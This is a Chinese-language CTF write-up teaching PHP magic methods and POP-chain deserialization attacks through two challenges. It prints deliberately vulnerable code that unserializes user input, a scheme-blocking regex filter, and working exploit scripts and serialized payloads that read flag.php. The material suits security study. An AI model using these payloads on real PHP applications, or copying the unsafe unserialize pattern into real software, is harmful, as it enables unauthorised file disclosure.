当前位置: 首页 > 工具软件 > pop2blog > 使用案例 >

POP链实例解析学习

邢昊焜
2023-12-01

写在前面

POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。

基本魔法方法

我用的代码如下:

<?php
class A{
        public $a="hi";
        public $b="no";
        function __construct()
        {
            $this->a="hiiiii!";
            echo $this->a."\n";
            echo "this is construct\n";
        }
        function __wakeup()
        {
            echo "this is wakeup\n";
        }//反序列化之前
        function __destruct()
        {
            echo "this is destruct\n";
        }//反序列化时会最后才触发

        function __toString()
        {
            return "this is tostring\n";
        }
        function __call($name, $arguments)
        {
            echo "this is call\n";
        }
        function __get($a)
        {
            echo "this is get\n";
        }
        function __invoke()
        {
            echo "this is invoke\n";
        }//尝试当作函数
        

        function say_hi()
        {
            echo "hiuhiu\n";
        }
    }
    $aa=new A();// 所有最后都还要析构一次,对象的消失
    $aa->say_hi();
    $bb=serialize($aa);
    $cc=unserialize($bb); 
    echo $aa;// 作为字符串用时触发 tostring
    $aa->say_no(); //call
    $aa->c; //get
    $aa(); //invoke

引用

__sleep() //使用serialize时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当脚本尝试将对象调用为函数时触发

还有一些其他的,不过都大同小异
其实很多都是在处理对象可能产生的问题,比如强行当作字符串,强行当作函数,调用不存在的方法,调用不存在的属性,序列化,反序列化,它的消失,它的开始等等。

示例1

以下示例链接:https://blog.csdn.net/weixin_45645113/article/details/105309695
(仅使用了题目)

<?php
//flag is in flag.php
error_reporting(1);
class Read {
    public $var;
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
    public function __invoke(){
        $content = $this->file_get($this->var);
        echo $content;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file='index.php')
    {
        $this->source = $file;
        echo $this->source.'Welcome'."<br>";
    }//用来欢迎

    public function __toString()
    {
        return $this->str['str']->source;
    }

    public function _show()
    {
        if(preg_match('/gopher|http|ftp|https|dict|\.\.|flag|file/i',$this->source)) {
            die('hacker');
        } else {
            highlight_file($this->source); 
        }

    }

    public function __wakeup()
    {
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }//用来替换
}

class Test
{
    public $p;
    public function __construct()
    {
        $this->p = array();
    }

    public function __get($key)
    {
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['hello']))
{
    unserialize($_GET['hello']);
}
else
{
    $show = new Show('pop3.php');
    $show->_show();
}

一开始看是非常烦人的,所以开始这里的练习之前,你需要对魔法方法比较熟悉。POP链是一环扣着一环,像一个链条一样,这也就是说它是紧密联系起来的。
我们只需找到入口和出口,任意反推或者正推就比较好解决

思路

首先这里传入数据的入口是反序列化,那就是__wakeup(),出口那就是要读取文件,那就是 __invoke()和_show() ,一个是魔法方法,一个是普通方法。

1. 使用正推,进入wakeup后看起来是一个非常正常的函数,只能通过$this->source来完成跳转,这里的可能有两个,一是利用属性不存在跳转__get(),二是利用将对象作为字符串使用跳转__toString()(preg_match函数的第二个参数就是string类型)。第一个方法行不通,因为类中没有__get()方法。所以要用第二种方案,后续exp中详细说明这种方案。

2. 假设进入__toString()后,显然是需要str[‘str’]返回一个对象时去搜寻source属性,下一步就是无法搜索到这个属性就可以跳转__get(),但是这里是需要跳转到Test类才有__get(),那么就让str['str']返回的对象是Test对象

3. 进入__get()后,找到它的属性并强行调用方法,明显就需要跳转至__invoke(),那么就要让$this->p找到Read类中。

4. 进入__invoke()后将$var设为你想要的文件就到达出口了。

最后在书写exp时将整个思路倒过来就可以完成了,反序列内容从外到里读,写是从里到外写嘛。
将Read类的对象放入Test类的p属性中,再将上述的一堆放入str[‘str’],最后要将对象作为字符串,那么让Show类的source属性等于对象自己就可以了
exp:

<?php
class Show{
	public $source;
	public $str;
}
class Test {
	public $p;
}
class Read{
	public $var = "flag.php";
}

$s = new Show();
echo '$s  :  '.serialize($s)."\n";
$t = new Test();
echo '$t  :  '.serialize($t)."\n";
$r = new Read();
echo '$r  :  '.serialize($r)."\n";
$t -> p = $r;
$s ->str["str"] = $t;
$s -> source = $s;
//var_dump($s);
var_dump(serialize($s));

$s  :  O:4:"Show":2:{s:6:"source";N;s:3:"str";N;}
$t  :  O:4:"Test":1:{s:1:"p";N;}
$r  :  O:4:"Read":1:{s:3:"var";s:8:"flag.php";}
string(121) "O:4:"Show":2:{s:6:"source";r:1;s:3:"str";a:1:{s:3:"str";O:4:"Test":1:{s:1:"p";O:4:"Read":1:{s:3:"var";s:8:"flag.php";}}}}"

payload:

O:4:"Show":2:{s:6:"source";r:1;s:3:"str";a:1:{s:3:"str";O:4:"Test":1:{s:1:"p";O:4:"Read":1:{s:3:"var";s:8:"flag.php";}}}}

在编写payload时重要的就是装载方式,找到跳转位置,即能够像链条一样串起整个思路。

示例2(2019安恒一月月赛web1-babygo)

现在来看看反推的思路,也是比赛题。

<?php  
@error_reporting(1); 
include 'flag.php';
class baby 
{   
    protected $skyobj;  
    public $aaa;
    public $bbb;
    function __construct() 
    {      
        $this->skyobj = new sec;
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}  

class cool 
{    
    public $filename;     
    public $nice;
    public $amzing; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";        
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "you must be joking!"; 
            }    
        }
    }  
}  
  
class sec 
{  
    function read()     
    {          
        return "it's so sec~~";      
    }  
}  

if (isset($_GET['data']))  
{ 
    $Input_data = unserialize($_GET['data']);
    echo $Input_data; 
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?>

1.分析一下题目,首先非常明显,本题出口是cool类中的read方法,但是如果我们直接序列化cool类,无法触发实际方法。

2.看到在baby类中可以触发一个read(),那么也就是让$this->skyobj为cool对象即可,不过这里是在__toString()中,正好主函数中有一个echo $Input_data;可以进行触发。

3.触发后进入read()方法,首先就要反序列化amzing属性,将结果给nice属性,后续nice属性中有aaa,bbb两个属性,说明nice属性是baby类,也就是amzing反序列化结果是baby类。还得序列化一下baby类传到amzing处。

4.然后又被$sth恶意修改了一下,不知道修改成了什么,要保证它们两个属性相等,就可以让bbb属性跟随aaa变化。传一个地址就可以了。

EXP

值得注意的是,这里是一个protected,需要从类内部操作,不能从外面赋。比如这里的skyobj属性要为对象,就不能先初始化cool对象再赋值过去, protected只能在类及其子类中用,外部不可访问,所以要利用__construct()来初始化。

可能你还注意到,baby中的skyobj要以cool类来建立,而cool类中的amzing属性又是与baby类有关,那么究竟谁先谁后呢?
这里要小小的分析一下,cool类作为后验证的东西,它是使用baby类中的aaa等属性,和skyobj属性关系不大,所以你可以先将baby类序列化后的值赋给amzing。

但是,由于刚刚用了__construct(),当我们想要将baby类序列化后的值赋给amzing。 就会触发到,从而让__contrust()提前触发,所以还得分开,先单独序列化一下不带__construct()的baby,然后给他赋好。

<?php
    class baby
    {
        protected $skyobj;
        public $aaa;
        public $bbb;
        function __construct() 
        {          
            $this->skyobj = new cool;   
        }  
    }
    
    class cool
    {
        public $filename="flag.php";
        public $nice;
        public $amzing='O:4:"baby":3:{s:9:"\000*\000skyobj";N;s:3:"aaa";N;s:3:"bbb";N;}';
    }


$b= new baby();

$b->aaa=&$b->bbb;

var_dump(urlencode(serialize($b)));

这样就完成了

 类似资料: